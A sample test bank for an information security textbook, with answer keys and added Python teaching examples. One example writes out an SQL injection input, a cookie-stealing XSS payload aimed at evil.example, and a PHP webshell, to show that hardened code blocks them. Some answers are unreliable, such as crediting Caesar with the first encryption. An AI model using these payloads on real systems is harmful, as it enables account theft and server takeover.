Information Security And IT Risk Management 1st Edition by Manish Agrawal – Test Bank
Sample Questions
Information security and IT risk management – Question bank By Manish Agrawal, Alex Campoe and Eric Pierce |
- Chapter 4 – Basic information security model
1. Assets are
a) Resources or information that are to be protected
b) Safeguards used to minimize the impact of threats
c) Capabilities, intentions and attack methods of adversaries to cause harm to assets
d) Weaknesses in an information system that can lead to a compromise of an asset
Answer: (a)
2. Threats are
a) Safeguards used to minimize the impact of threats
b) Capabilities, intentions and attack methods of adversaries to cause harm to assets
c) Resources or information that are to be protected
d) Weaknesses in an information system that can lead to a compromise of an asset
Answer: (b)
3. Relative to physical security, information security is challenging because
a) Assets are largely invisible
b) Most assets are easily duplicated
c) Both of the above
d) None of the above
Answer: (c)
4. Vulnerabilities are
a) Safeguards used to minimize the impact of threats
b) Capabilities, intentions and attack methods of adversaries to cause harm to assets
c) Resources or information that are to be protected
d) Weaknesses in an information system that can lead to a compromise of an asset
Answer: (d)
5. Controls are
a) Safeguards used to minimize the impact of threats
b) Capabilities, intentions and attack methods of adversaries to cause harm to assets
c) Resources or information that are to be protected
d) Weaknesses in an information system that can lead to a compromise of an asset
Answer: (a)
6. Vulnerabilities in IT systems can be eliminated through secure coding practices
a) True
b) False
Answer: (b)
7. Models are useful because
a) They highlight resources or information that are to be protected
b) They highlight weaknesses in information systems that can be compromised
c) They draw attention to the essential details of a problem
d) They describe safeguards used to minimize the impact of threats
Answer: (c)
8. The CVE list is
a) A list of all likely impacts of vulnerabilities
b) A list of all known viruses
c) A list of all known information security firms
d) An inventory of known software vulnerabilities
Answer: (d)
9. The NVD (National Vulnerability Database)
a) Describes likely impacts and measures to remove vulnerabilities
b) Is a list of all known viruses
c) Is a list of all known information security firms
d) Is an inventory of known software vulnerabilities
Answer: (a)
10. As reported in the chapter, recent trends in vulnerabilities and threats indicate that
a) Increasing numbers of new vulnerabilities are being discovered, and the number of attacks is also going up
b) Decreasing numbers of new vulnerabilities are being discovered, but the number of attacks is going up
c) Decreasing numbers of new vulnerabilities are being discovered, and the number of attacks is also going down
d) Increasing numbers of new vulnerabilities are being discovered, but the number of attacks is going down
Answer: (b)
11. Zeus and SpyEye are examples of
a) Viruses
b) Vulnerabilities
c) IDEs to create new attacks
d) Systems to defend against attacks
Answer: (c)
12. A lack-of-input-validation vulnerability refers to a situation where
a) Files are accepted as input without verifying their specifications
b) Input from one user is supplied as output to other users
c) A program puts more data into a storage location than it can hold
d) User input is used without confirming its validity
Answer: (d)
13. An unrestricted upload vulnerability refers to a situation where
a) Files are accepted as input without verifying their specifications
b) Input from one user is supplied as output to other users
c) A program puts more data into a storage location than it can hold
d) User input is used without confirming its validity
Answer: (a)
14. A cross-site scripting vulnerability can occur when
a) Files are accepted as input without verifying their specifications
b) Input from one user is supplied as output to other users
c) A program puts more data into a storage location than it can hold
d) User input is used without confirming its validity
Answer: (b)
15. A buffer overflow vulnerability refers to a situation where
a) Files are accepted as input without verifying their specifications
b) Input from one user is supplied as output to other users
c) A program puts more data into a storage location than it can hold
d) User input is used without confirming its validity
Answer: (c)
16. A SQL injection vulnerability is an example of a
a) Unrestricted upload vulnerability
b) Cross-site scripting vulnerability
c) Buffer overflow vulnerability
d) Lack-of-input-validation vulnerability
Answer: (d)
17. A missing authorization vulnerability refers to a situation where
a) Users are allowed access to privileged parts of a program without checking that they are entitled to that access
b) Input from one user is supplied as output to other users
c) A program puts more data into a storage location than it can hold
d) User input is used without confirming its validity
Answer: (a)
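Questions 12 through 17 describe the lack-of-input-validation family by definition only. The following Python program is an added example, not part of the question bank or the textbook, that shows three of those flaws in vulnerable and hardened form side by side: a login query built by string formatting against a parameterized query (SQL injection, questions 12 and 16), a comment echoed to other users raw against the same comment HTML-escaped (cross-site scripting, question 14), and an upload check that verifies a file's extension and magic bytes (unrestricted upload, question 13). The users table, the credentials, the attacker inputs and the file contents are all constructed for the example.

```python
# Added example (not from the question bank): vulnerable and hardened forms of
# three input-handling flaws. The users table, the attacker inputs and the
# uploaded files are all constructed for illustration.
import html
import sqlite3


def make_db() -> sqlite3.Connection:
    """In-memory users table holding one constructed account."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.execute("INSERT INTO users VALUES ('alice', 'correct horse')")
    return conn


def login_vulnerable(conn: sqlite3.Connection, username: str, password: str) -> bool:
    """Lack of input validation: user input is spliced into the SQL text, so a
    quote in the input can change the query's meaning (SQL injection)."""
    query = ("SELECT COUNT(*) FROM users WHERE username = '%s' AND password = '%s'"
             % (username, password))
    return conn.execute(query).fetchone()[0] > 0


def login_safe(conn: sqlite3.Connection, username: str, password: str) -> bool:
    """Parameterized query: the values travel separately from the SQL text, so
    quotes in the input are data, never syntax."""
    row = conn.execute(
        "SELECT COUNT(*) FROM users WHERE username = ? AND password = ?",
        (username, password)).fetchone()
    return row[0] > 0


def render_comment_vulnerable(comment: str) -> str:
    """Input from one user is supplied as output to other users unchanged, so a
    script tag in the comment runs in every viewer's browser (XSS)."""
    return '<div class="comment">%s</div>' % comment


def render_comment_safe(comment: str) -> str:
    """Output encoding turns < > & " ' into entities, so the browser renders the
    comment as text whatever it contains."""
    return '<div class="comment">%s</div>' % html.escape(comment, quote=True)


PNG_MAGIC = b"\x89PNG\r\n\x1a\n"


def upload_allowed(filename: str, data: bytes) -> bool:
    """Unrestricted upload, fixed: accept a file only if its extension is on the
    allowlist and its content starts with the magic bytes for that type. (The
    vulnerable form is simply to save whatever arrives.)"""
    return filename.lower().endswith(".png") and data.startswith(PNG_MAGIC)


def demo() -> dict:
    conn = make_db()
    # Constructed attacker inputs.
    injected_user = "alice' --"    # closes the quote, comments out the password check
    xss_payload = "<script>fetch('http://evil.example/?c=' + document.cookie)</script>"
    webshell = ("shell.php", b"<?php system($_GET['cmd']); ?>")
    image = ("avatar.png", PNG_MAGIC + b"\x00" * 16)
    return {
        "vuln_login_bypassed": login_vulnerable(conn, injected_user, "wrong"),
        "safe_login_bypassed": login_safe(conn, injected_user, "wrong"),
        "safe_login_correct": login_safe(conn, "alice", "correct horse"),
        "vuln_html_has_script": "<script>" in render_comment_vulnerable(xss_payload),
        "safe_html_has_script": "<script>" in render_comment_safe(xss_payload),
        "webshell_accepted": upload_allowed(*webshell),
        "image_accepted": upload_allowed(*image),
    }


if __name__ == "__main__":
    for name, value in demo().items():
        print(f"{name}: {value}")
```

The injected username turns the vulnerable query into `... WHERE username = 'alice' --' AND password = 'wrong'`, so the password check is commented away and the login succeeds; the parameterized version looks for a user literally named `alice' --` and finds none.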
18. Denial of service refers to
a) Programs that propagate through the network without a user's consent
b) Unauthorized prevention of access to resources
c) Attempting to compromise a user by masquerading as a trustworthy entity in electronic communication
d) Code specifically designed to exploit a computer or data, without the user's consent
Answer: (b)
19. Phishing refers to
a) Programs that propagate through the network without a user's consent
b) Unauthorized prevention of access to resources
c) Attempting to compromise a user by masquerading as a trustworthy entity in electronic communication
d) Code specifically designed to exploit a computer or data, without the user's consent
Answer: (c)
20. Malware refers to
a) Programs that propagate through the network without a user's consent
b) Unauthorized prevention of access to resources
c) Attempting to compromise a user by masquerading as a trustworthy entity in electronic communication
d) Code specifically designed to exploit a computer or data, without the user's consent
Answer: (d)
21. Rootkits are
a) Software used to hide the existence of malicious software on computer systems
b) Exploits that compromise a previously unknown software vulnerability
c) Computers that perform malicious tasks at the direction of a remote controller
d) Manipulating people into performing desired actions
Answer: (a)
22. Zero-day exploits are
a) Software used to hide the existence of malicious software on computer systems
b) Exploits that compromise a previously unknown software vulnerability
c) Computers that perform malicious tasks at the direction of a remote controller
d) Manipulating people into performing desired actions
Answer: (b)
23. Zombies are
a) Software used to hide the existence of malicious software on computer systems
b) Exploits that compromise a previously unknown software vulnerability
c) Computers that perform malicious tasks at the direction of a remote controller
d) Manipulating people into performing desired actions
Answer: (c)
24. Social engineering is
a) Software used to hide the existence of malicious software on computer systems
b) Exploits that compromise a previously unknown software vulnerability
c) Computers that perform malicious tasks at the direction of a remote controller
d) Manipulating people into performing desired actions
Answer: (d)
25. Physical controls
a) Use non-technical methods of preventing harm
b) Are the security measures built into the information system itself
c) Perform malicious tasks at the direction of a remote controller
d) Manipulate people into performing desired actions
Answer: (a)
- Chapter 7 – Encryption controls
1. Encryption is
a) The transformation of data to produce ciphertext
b) Text that is unintelligible to the reader
c) A sequence of symbols that controls the operations of encipherment and decipherment
d) A well-defined sequence of steps used to describe cryptographic processes
e) An encryption method that uses no keys
Answer: (a)
2. Ciphertext is
a) The transformation of data to produce ciphertext
b) Text that is unintelligible to the reader
c) A sequence of symbols that controls the operations of encipherment and decipherment
d) A well-defined sequence of steps used to describe cryptographic processes
e) An encryption method that uses no keys
Answer: (b)
3. The word cipher comes from the Arabic word cifr, which means
a) Sender
b) Secret
c) Nothing
d) Receiver
Answer: (c)
4. The first documented instance of encryption was used by
a) Egyptian pharaoh Tutankhamun
b) Italian inventor Leonardo da Vinci
c) Italian artist Michelangelo
d) Roman Emperor Julius Caesar
Answer: (d)
5. Cryptanalysis is
a) The art of breaking ciphertext
b) The transformation of data to produce ciphertext
c) The science of creating superior encryption algorithms
d) Text that is unintelligible to the reader
Answer: (a)
6. A cryptographic algorithm is
a) Symbols that control encipherment and decipherment
b) A well-defined sequence of steps used to describe cryptographic processes
c) An encryption method that uses no keys
d) Text that is unintelligible to the reader
Answer: (b)
7. In the context of encryption, a key is
a) A well-defined sequence of steps used to describe cryptographic processes
b) An encryption method that uses no keys
c) A sequence of symbols that controls the operations of encipherment and decipherment
d) Text that is unintelligible to the reader
Answer: (c)
8. Desirable properties in good encryption algorithms include
a) Generating characters that appear random
b) Generating output that appears to be of random length
c) Changing about half the bits in the output when even one bit changes in the input
d) All of the above
Answer: (d)
9. Secret key cryptography refers to
a) The use of the same key for both encryption and decryption
b) The use of a secret algorithm for encryption and decryption
c) The use of a secret key only for decryption
d) The use of a secret key for encryption
Answer: (a)
10. The current standard for secret key encryption is
a) DES (Data Encryption Standard)
b) AES (Advanced Encryption Standard)
c) IDEA (International Data Encryption Algorithm)
d) SHA (Secure Hash Algorithm)
Answer: (b)
11. Public key cryptography refers to
a) The use of the same key for both encryption and decryption
b) The use of a secret algorithm for encryption and decryption
c) The use of a secret (private) key only for decryption
d) The use of a secret key for encryption
Answer: (c)
12. In public key encryption, messages are deciphered using
a) A public key
b) A shared secret key
c) Any key
d) A private key
Answer: (d)
13. Public key encryption is used primarily for
a) Sharing a secret key prior to network transmission
b) Storing data on hard drives
c) Encrypting data during transmission over a network
d) Saving passwords
Answer: (a)
14. Digital signatures are
a) The transformation of data to produce ciphertext
b) The use of cryptography that allows a user to prove the source and integrity of data
c) Text that is unintelligible to the reader
d) A sequence of symbols that controls the operations of encipherment and decipherment
Answer: (b)
15. Hash functions use
a) 2 keys
b) 1 key
c) 0 keys
d) Any of the above, depending upon the specific hash algorithm
Answer: (c)
16. Hash functions are used primarily for
a) Sharing a secret key prior to network transmission
b) Storing data on hard drives
c) Encrypting data during transmission over a network
d) Saving passwords
Answer: (d)
17. Claude Shannon developed the framework for secrecy known as
a) Confusion and diffusion
b) 4P model
c) 4C model
d) Inversion of control
Answer: (a)
18. Block encryption uses both
a) Relational and procedural operations
b) Substitution and permutation
c) Keys and hashes
d) Data and storage
Answer: (b)
19. Electronic Code Book (ECB) mode is not recommended for encrypting messages longer than one block since it has inadequate
a) Licensing flexibility
b) Recovery features
c) Diffusion across blocks (identical plaintext blocks produce identical ciphertext blocks)
d) Parallelism
Answer: (c)
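Questions 17 through 19 name confusion and diffusion, substitution and permutation, and ECB mode without showing them in operation. The following Python program is an added example, not part of the question bank or the textbook: a toy 64-bit Feistel block cipher whose round function is an HMAC (the substitution step), with the two halves swapped every round (the permutation step), run in ECB and in CBC mode. The point it demonstrates is the one behind question 19: under ECB a plaintext made of repeated blocks produces repeated ciphertext blocks, while CBC chains each block into the next so the repetition disappears. The cipher is a teaching construction rather than AES, and the key, IV and plaintext are constructed for the example.

```python
# Added example (not from the question bank): a toy Feistel block cipher run in
# ECB and CBC modes. Teaching construction only, not AES; key, IV and plaintext
# are constructed for illustration.
import hashlib
import hmac

BLOCK = 8      # 64-bit blocks; AES uses 128-bit blocks
HALF = BLOCK // 2
ROUNDS = 4


def _xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))


def _round(key: bytes, r: int, half: bytes) -> bytes:
    """Round function (the substitution step): a keyed hash of the round number
    and the right half. It supplies confusion, the complex dependence of the
    output on the key."""
    return hmac.new(key, bytes([r]) + half, hashlib.sha256).digest()[:HALF]


def encrypt_block(key: bytes, block: bytes) -> bytes:
    """Feistel network: each round substitutes via _round and swaps the halves
    (the permutation step). The swap makes the network invertible whatever
    _round is, so decryption needs no inverse of the hash."""
    left, right = block[:HALF], block[HALF:]
    for r in range(ROUNDS):
        left, right = right, _xor(left, _round(key, r, right))
    return right + left          # undo the final swap, as DES does


def decrypt_block(key: bytes, block: bytes) -> bytes:
    """The same network with the round keys applied in reverse order."""
    left, right = block[:HALF], block[HALF:]
    for r in reversed(range(ROUNDS)):
        left, right = right, _xor(left, _round(key, r, right))
    return right + left


def pad(data: bytes) -> bytes:
    """PKCS#7 padding up to a whole number of blocks."""
    n = BLOCK - len(data) % BLOCK
    return data + bytes([n]) * n


def unpad(data: bytes) -> bytes:
    return data[:-data[-1]]


def blocks(data: bytes):
    return (data[i:i + BLOCK] for i in range(0, len(data), BLOCK))


def ecb_encrypt(key: bytes, data: bytes) -> bytes:
    """ECB: every block is encrypted independently, so equal plaintext blocks
    give equal ciphertext blocks and the structure of the plaintext shows."""
    return b"".join(encrypt_block(key, b) for b in blocks(pad(data)))


def cbc_encrypt(key: bytes, iv: bytes, data: bytes) -> bytes:
    """CBC: each plaintext block is XORed with the previous ciphertext block
    before encryption, so every block diffuses into all the blocks after it."""
    out, prev = [], iv
    for b in blocks(pad(data)):
        prev = encrypt_block(key, _xor(b, prev))
        out.append(prev)
    return b"".join(out)


def cbc_decrypt(key: bytes, iv: bytes, data: bytes) -> bytes:
    out, prev = [], iv
    for b in blocks(data):
        out.append(_xor(decrypt_block(key, b), prev))
        prev = b
    return unpad(b"".join(out))


def distinct_blocks(ciphertext: bytes) -> int:
    return len(set(blocks(ciphertext)))


def demo() -> dict:
    key = b"constructed-key!"
    iv = b"\x00" * BLOCK           # constructed; real CBC needs a fresh random IV per message
    plaintext = b"SALARY=0" * 4    # constructed: the same 8-byte record four times
    ecb = ecb_encrypt(key, plaintext)
    cbc = cbc_encrypt(key, iv, plaintext)
    return {
        "blocks": len(ecb) // BLOCK,             # 4 data blocks + 1 padding block
        "ecb_distinct": distinct_blocks(ecb),    # only 2: the four repeats are visible
        "cbc_distinct": distinct_blocks(cbc),    # 5: every ciphertext block differs
        "cbc_roundtrip": cbc_decrypt(key, iv, cbc) == plaintext,
    }


if __name__ == "__main__":
    for name, value in demo().items():
        print(f"{name}: {value}")
```

Because a block cipher is a fixed permutation of the block space under a given key, ECB maps the four identical records to four identical ciphertext blocks, which is exactly the missing diffusion the question refers to; the padding block is the only other distinct value. Encrypting a bitmap image block by block in ECB produces the well-known "penguin" effect for the same reason.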
20. Public key encryption techniques used in practice are based heavily on
a) Division operations
b) Set operations
c) Extraction operations
d) Modulus operations
Answer: (d)
21. 17 mod 11 is
a) 6
b) 8
c) 7
d) 0
Answer: (a)
22. The popular encryption method RSA is an example of
a) Secret key encryption
b) Public key encryption
c) Hash functions
d) AES
Answer: (b)
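Questions 11 through 14 and 20 through 22 describe public key cryptography in terms of modular arithmetic, decryption with the private key, sharing a secret key, and digital signatures. The following Python program is an added example, not part of the question bank or the textbook, that carries those ideas through with textbook RSA: key generation from two fixed, well-known primes, encryption with the public key and decryption with the private key, sending a random symmetric key under the recipient's public key (question 13), and signing a hash with the private key so that anyone holding the public key can check source and integrity (question 14). The primes, exponent and messages are constructed for illustration; real RSA uses much larger random primes and padding schemes (OAEP for encryption, PSS for signatures), which this example omits.

```python
# Added example (not from the question bank): textbook RSA on small, fixed
# primes. Teaching only: real RSA uses 2048-bit-plus random primes and padding
# (OAEP/PSS); the fixed primes below are public knowledge, not a secret.
import hashlib
import secrets

# Constructed key material: two well-known primes (10**9 + 7 and 998244353).
P, Q = 1_000_000_007, 998_244_353
E = 65537


def is_prime(n: int) -> bool:
    """Trial division, adequate for the toy sizes used here."""
    if n < 2:
        return False
    i = 2
    while i * i <= n:
        if n % i == 0:
            return False
        i += 1
    return True


def keygen(p: int = P, q: int = Q, e: int = E) -> tuple:
    """Returns ((n, e), (n, d)): the public key and the private key."""
    assert is_prime(p) and is_prime(q)
    n = p * q
    phi = (p - 1) * (q - 1)
    d = pow(e, -1, phi)          # modular inverse: e * d == 1 (mod phi)
    return (n, e), (n, d)


def encrypt(public_key: tuple, m: int) -> int:
    n, e = public_key
    assert 0 <= m < n            # the message must be smaller than the modulus
    return pow(m, e, n)          # c = m^e mod n


def decrypt(private_key: tuple, c: int) -> int:
    n, d = private_key
    return pow(c, d, n)          # m = c^d mod n, only with the private exponent


def digest_int(message: bytes, n: int) -> int:
    """SHA-256 of the message as an integer below the modulus."""
    return int.from_bytes(hashlib.sha256(message).digest(), "big") % n


def sign(private_key: tuple, message: bytes) -> int:
    """Signing applies the private exponent to the hash of the message."""
    n, d = private_key
    return pow(digest_int(message, n), d, n)


def verify(public_key: tuple, message: bytes, signature: int) -> bool:
    """Anyone with the public key can check that the signature undoes to the
    hash of exactly this message: source (private key holder) and integrity."""
    n, e = public_key
    return pow(signature, e, n) == digest_int(message, n)


def share_secret_key(public_key: tuple) -> tuple:
    """Hybrid use (question 13): the sender picks a random symmetric key and
    sends it encrypted under the recipient's public key. Returns (key, ciphertext)."""
    n, _ = public_key
    k = secrets.randbelow(n)
    return k, encrypt(public_key, k)


def demo() -> dict:
    pub, priv = keygen()
    _, other_priv = keygen(1_000_000_009, 998_244_353)   # a different party's private key
    k, c = share_secret_key(pub)
    msg = b"transfer 100 to bob"
    sig = sign(priv, msg)
    return {
        "shared_key_recovered": decrypt(priv, c) == k,
        "other_key_recovers": decrypt(other_priv, c) == k,
        "signature_valid": verify(pub, msg, sig),
        "tampered_accepted": verify(pub, b"transfer 999 to bob", sig),
    }


if __name__ == "__main__":
    for name, value in demo().items():
        print(f"{name}: {value}")
```

Every operation is a modular exponentiation, which is what question 20 means by public key techniques being based on modulus operations; `pow(e, -1, phi)` is Python's built-in modular inverse.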
23. For a given hash function, the length of the hash output of any input is
a) Always shorter than the input
b) Dependent upon the length of the input
c) Always the same
d) Always longer than the input
Answer: (c)
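Questions 8, 15, 16 and 23 state properties of hash functions: fixed output length, no key, roughly half the output bits changing when one input bit changes, and use for storing passwords. The following Python program is an added example, not part of the question bank or the textbook, that checks each of these with SHA-256 from the standard library and shows the password-storage pattern that the "saving passwords" answer refers to: a random per-user salt, a deliberately slow salted hash (PBKDF2-HMAC-SHA256), and a constant-time comparison. The inputs, passwords and salts are constructed for the example.

```python
# Added example (not from the question bank): hash function properties and
# salted password storage with SHA-256 and PBKDF2. Inputs, passwords and
# salts are constructed for illustration.
import hashlib
import hmac
import os


def sha256_hex(data: bytes) -> str:
    """Unkeyed hash: the only input is the data itself."""
    return hashlib.sha256(data).hexdigest()


def output_lengths(inputs: list) -> set:
    """Fixed-length output: every SHA-256 digest is 32 bytes, whatever the
    length of the input."""
    return {len(hashlib.sha256(x).digest()) for x in inputs}


def differing_bits(a: bytes, b: bytes) -> int:
    """Number of bit positions in which two equal-length byte strings differ."""
    return sum(bin(x ^ y).count("1") for x, y in zip(a, b))


def avalanche(message: bytes) -> int:
    """Flip one bit of the input and count how many of the 256 output bits
    change; a good hash changes about half of them."""
    flipped = bytes([message[0] ^ 0x01]) + message[1:]
    return differing_bits(hashlib.sha256(message).digest(),
                          hashlib.sha256(flipped).digest())


# Password storage: store neither the password nor a bare hash of it. Store a
# random salt plus a slow, salted hash, and compare in constant time so that
# timing does not reveal how many leading bytes matched.
ITERATIONS = 100_000


def hash_password(password: str, salt: bytes = None) -> tuple:
    salt = salt if salt is not None else os.urandom(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, ITERATIONS)
    return salt, digest


def verify_password(password: str, salt: bytes, stored: bytes) -> bool:
    _, candidate = hash_password(password, salt)
    return hmac.compare_digest(candidate, stored)


def demo() -> dict:
    inputs = [b"", b"a", b"The quick brown fox", b"x" * 10_000]
    salt, stored = hash_password("correct horse battery staple")
    return {
        "digest_lengths": output_lengths(inputs),          # {32}, regardless of input size
        "bits_changed": avalanche(b"pay 100 to alice"),    # close to 128 of 256
        "same_input_same_hash": sha256_hex(b"abc") == sha256_hex(b"abc"),
        "password_ok": verify_password("correct horse battery staple", salt, stored),
        "password_wrong": verify_password("correct horse battery stapler", salt, stored),
        "salt_changes_hash": hash_password("pw", b"salt-1")[1] != hash_password("pw", b"salt-2")[1],
    }


if __name__ == "__main__":
    for name, value in demo().items():
        print(f"{name}: {value}")
```

The salt is what defeats precomputed tables: two users with the same password get different stored values, and an attacker who steals the table must attack each entry separately at the cost of ITERATIONS hash computations per guess.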
24. A certificate used in web applications contains the
a) Shared secret key prior to network transmission
b) Hash output of the data to be transmitted
c) Saved password of the end user for recovery
d) Public key of the server and information about its owner and the certificate authority that issued it
Answer: (d)
25. The most common technologies used for secure network communication are
a) VPN and SSL/TLS
b) AES and DES
c) PKI and RSA
d) Diffusion and confusion
Answer: (a)